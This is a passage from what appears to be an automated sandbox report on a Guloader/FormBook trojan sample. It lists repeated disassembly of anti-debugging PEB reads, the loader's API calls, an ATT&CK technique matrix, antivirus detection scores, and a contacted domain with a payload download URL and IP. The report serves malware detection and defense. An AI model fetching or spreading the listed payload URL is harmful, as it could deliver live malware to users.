      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F705E mov ebx, dword ptr fs:[00000030h]9_2_369F705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F705E mov eax, dword ptr fs:[00000030h]9_2_369F705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25060 mov eax, dword ptr fs:[00000030h]9_2_36A25060
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B052 mov eax, dword ptr fs:[00000030h]9_2_3697B052
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov ecx, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD070 mov ecx, dword ptr fs:[00000030h]9_2_369CD070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D106E mov eax, dword ptr fs:[00000030h]9_2_369D106E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A7190 mov eax, dword ptr fs:[00000030h]9_2_369A7190
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696B1B0 mov eax, dword ptr fs:[00000030h]9_2_3696B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D1D0 mov eax, dword ptr fs:[00000030h]9_2_3698D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D1D0 mov ecx, dword ptr fs:[00000030h]9_2_3698D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F71F9 mov esi, dword ptr fs:[00000030h]9_2_369F71F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A251CB mov eax, dword ptr fs:[00000030h]9_2_36A251CB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369551ED mov eax, dword ptr fs:[00000030h]9_2_369551ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951131 mov eax, dword ptr fs:[00000030h]9_2_36951131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951131 mov eax, dword ptr fs:[00000030h]9_2_36951131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957152 mov eax, dword ptr fs:[00000030h]9_2_36957152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E9179 mov eax, dword ptr fs:[00000030h]9_2_369E9179
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25152 mov eax, dword ptr fs:[00000030h]9_2_36A25152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957E96 mov eax, dword ptr fs:[00000030h]9_2_36957E96
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DDE9B mov eax, dword ptr fs:[00000030h]9_2_369DDE9B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0DEB0 mov eax, dword ptr fs:[00000030h]9_2_36A0DEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983E8F mov eax, dword ptr fs:[00000030h]9_2_36983E8F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov ecx, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DEA5 mov eax, dword ptr fs:[00000030h]9_2_3694DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DEA5 mov ecx, dword ptr fs:[00000030h]9_2_3694DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694FEA0 mov eax, dword ptr fs:[00000030h]9_2_3694FEA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DDEAA mov eax, dword ptr fs:[00000030h]9_2_369DDEAA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BEC0 mov eax, dword ptr fs:[00000030h]9_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BEC0 mov eax, dword ptr fs:[00000030h]9_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697FEC0 mov eax, dword ptr fs:[00000030h]9_2_3697FEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DFEC5 mov eax, dword ptr fs:[00000030h]9_2_369DFEC5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov ecx, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov eax, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov eax, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EE1 mov eax, dword ptr fs:[00000030h]9_2_36953EE1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DE10 mov eax, dword ptr fs:[00000030h]9_2_3694DE10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BE17 mov eax, dword ptr fs:[00000030h]9_2_3698BE17
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951E30 mov eax, dword ptr fs:[00000030h]9_2_36951E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951E30 mov eax, dword ptr fs:[00000030h]9_2_36951E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]9_2_3696DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]9_2_3696DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]9_2_3696DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BE51 mov eax, dword ptr fs:[00000030h]9_2_3698BE51
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BE51 mov eax, dword ptr fs:[00000030h]9_2_3698BE51
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F9E56 mov ecx, dword ptr fs:[00000030h]9_2_369F9E56
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36965E40 mov eax, dword ptr fs:[00000030h]9_2_36965E40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0DE46 mov eax, dword ptr fs:[00000030h]9_2_36A0DE46
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BE78 mov ecx, dword ptr fs:[00000030h]9_2_3694BE78
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]9_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694FF90 mov edi, dword ptr fs:[00000030h]9_2_3694FF90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F3F90 mov eax, dword ptr fs:[00000030h]9_2_369F3F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F3F90 mov eax, dword ptr fs:[00000030h]9_2_369F3F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36991FB8 mov eax, dword ptr fs:[00000030h]9_2_36991FB8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BFB0 mov eax, dword ptr fs:[00000030h]9_2_3698BFB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BFD0 mov eax, dword ptr fs:[00000030h]9_2_3694BFD0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D3FD7 mov eax, dword ptr fs:[00000030h]9_2_369D3FD7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]9_2_36981FCD
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]9_2_36981FCD
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]9_2_36981FCD
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953FC2 mov eax, dword ptr fs:[00000030h]9_2_36953FC2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0BFC0 mov ecx, dword ptr fs:[00000030h]9_2_36A0BFC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0BFC0 mov eax, dword ptr fs:[00000030h]9_2_36A0BFC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]9_2_3698BFEC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]9_2_3698BFEC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]9_2_3698BFEC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DDF10 mov eax, dword ptr fs:[00000030h]9_2_369DDF10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D1F13 mov eax, dword ptr fs:[00000030h]9_2_369D1F13
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0DF2F mov eax, dword ptr fs:[00000030h]9_2_36A0DF2F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F7F3E mov eax, dword ptr fs:[00000030h]9_2_369F7F3E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951F50 mov eax, dword ptr fs:[00000030h]9_2_36951F50
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987F51 mov eax, dword ptr fs:[00000030h]9_2_36987F51
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CFF42 mov eax, dword ptr fs:[00000030h]9_2_369CFF42
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697BF60 mov eax, dword ptr fs:[00000030h]9_2_3697BF60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]9_2_36A0FCAB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A2

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		11
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory2
      File and Directory Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder      		11
      Process Injection      		Security Account Manager23
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Ntwph4urc1.exe75%VirustotalBrowse
      Ntwph4urc1.exe74%ReversingLabsWin32.Trojan.Guloader
      Ntwph4urc1.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://babalharra.com.au/yzSJO174.bin0%Avira URL Cloudsafe
      https://babalharra.com.au/0%Avira URL Cloudsafe
      https://babalharra.com.au/o0%Avira URL Cloudsafe
      https://babalharra.com.au/yzSJO174.binF0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      babalharra.com.au
      		122.201.127.17
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://babalharra.com.au/yzSJO174.binfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdNtwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
          		high
          https://babalharra.com.au/oNtwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
